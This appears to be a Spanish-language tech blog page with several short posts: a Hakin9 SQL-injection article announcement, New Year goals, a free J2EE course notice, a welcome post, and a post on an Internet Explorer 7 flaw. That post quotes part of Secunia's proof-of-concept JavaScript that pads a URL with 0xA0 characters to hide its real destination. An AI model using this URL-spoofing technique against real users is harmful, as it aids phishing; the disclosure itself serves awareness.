Categories
Artí­culos

Inyecciones SQL Hakin9

A modo de offtopic (no soy partidario de el pero una vez es una vez :P) os quería decir que ya ha salido mi articulo para la revista de seguridad informática Hakin9 de este mes (Julio).

En el hablo de las inyecciones de código SQL (muy famosas ya) y de algunas técnicas más, para los interesados el próximo mes publicare aquí el contenido integro del articulo.

Categories
Artí­culos

Nuevo año, nuevas expectativas

Empiezo a escribir esta entrada con una ligera sensación de decepción y tristeza...

  • Decepción: porque este año que acaba, a pesar de que aprendí bastante en algunos aspectos, lamentablemente no ha sido como hubiera querido.
  • Tristeza: por toda la carga emotiva que he tenido estos últimos días, espero que esto se me pase en unas cuantas horas, al menos por un momento... aunque leer cosas como la siguiente te hacen sentir un poco mejor:

    A veces la vida te pega en la cabeza con un ladrillo. No pierdas la fé. Estoy convencido que lo único que me mantuvo en pie era el hecho que amo hacer lo que hago. Tienes que encontrar eso que amas; esto aplica en tu trabajo como en tus relaciones amorosas. Una gran parte de tu vida estará enfocada en tu trabajo y la única manera de sentirte realmente satisfecho es creer que lo que haces es un excelente trabajo. La única manera de lograr un excelente trabajo es amando lo que haces. Si no lo encuentras todavía sigue buscando. No te rindas. Como todas las cosas relacionadas al corazón, sabrás exactamente cuando lo encuentres. Y, como en cualquier gran relación se va poniendo mejor y mejor a medida que el tiempo pasa. Así que sigue buscándolo hasta que lo encuentres, no te rindas.

    (…)

    Tu vida tiene un límite, no la malgastes viviendo la de otra persona. No atrapes a ti mismo por un dogma el cual implica vivir con los resultados de los pensamientos de terceros. No dejes que el ruido de las opiniones de otros ahoguen tu voz interna. Y lo más importante: ten el coraje de seguir tu corazón y tu intuición. Ellos de alguna manera saben lo que realmente quieres ser; el resto es secundario.

Para no cometer los mismos errores del 2006, pongo aquí algunas cosas que tengo que realizar el siguiente año (en especial el punto 1):

  1. Conseguir una beca para realizar un master -fuera de Perú- en Ciencias de la Computación.
  2. Reunir la mayor cantidad de dinero posible para solventar los gastos que impliquen la realización del punto 1. Se agradece de antemano si colaboran con lo de Adsense 😀
  3. Intentar realizar mi tesis de grado. Este punto ha sido la piedra en el zapato del 2006, ya que con el trabajo se me ha hecho dificil avanzar algo.
  4. Mejorar en gramática y ortografía.
  5. Publicar entradas en este blog con regular frecuencia.
  6. Convencer a mis amigas(os) y familiares para que inicien un blog.
  7. Abrir un blog personal.

Finalmente, doy las gracias a cada cada uno(a) de ustedes por haber dedicado parte de su valioso tiempo a leer este pequeño blog, espero que podamos seguir intercambiando algunas ideas/opiniones en el futuro.

Que tengan un feliz y productivo año 2007.

Categories
Artí­culos Seguridad

Otra vulnerabilidad en IE7

Secunia muestra una segunda vulnerabilidad en Internet Explorer 7 que facilita los ataques phishing, al mostrar sólo parte de una URL que contiene caracteres 0xA0.

A continuación, parte del contenido de la prueba de concepto que hizo Secunia.

html:

<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now - Left Click On This Link</font></a></div>
javascript:

<script language="JavaScript">
function StartTest()
{
 var padding = '';
 for ( i=0 ; i<108 ; i++)
 {
  padding += unescape("%A0");
 }
 newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
 newWindow.moveTo( (screen.width-325) , 0 );
 newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;
 document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}
</script>
Categories
Artí­culos Java

J2EE programming with passion

La 11va sesión del curso online de JavaTM EE (J2EE) Programming (with Passion!) comienza el 23 de Octubre del 2006. Este curso es dirigido por Sang Shin de Sun Microsystems y es completamente gratuito. Dirigido a toda la comunidad de programadores y profesionales en IT que deseen tener contacto con la tecnologia J2EE de Sun.

Para suscribirse pueden enviar un mail vacío a j2eerocks-subscribe@yahoogroups.com. O para mas detalle pueden visitar el sitio del curso.

Categories
Artí­culos

Hola Mundo!!!

Bueno primeramente quiero agradecer a mis amigos Alex y Braulio que tuvieron la desagradable idea de invitarme, pero es bienvenida con el mayor agrado que puedo sentir.

A partir de hoy, estaremos compartiendo experiencias sobre Administración de Proyectos e Ingeniería de Software. Para muchos, áreas muy aburridas pero veremos que son arte y creatividad y al mismo tiempo... disciplina.

Bueno otra de mis pasiones, que hace poco se me dio a conocer, es la programación en JAVA. La programación en este lenguaje no es muy difundida en mi región. Pero veremos las cosas interesantes que se puede lograr.

Pues vale, les doy la Bienvenida a todos, y les agradezco la bienvenida a mis amigos, los pelucones del Buayacorp.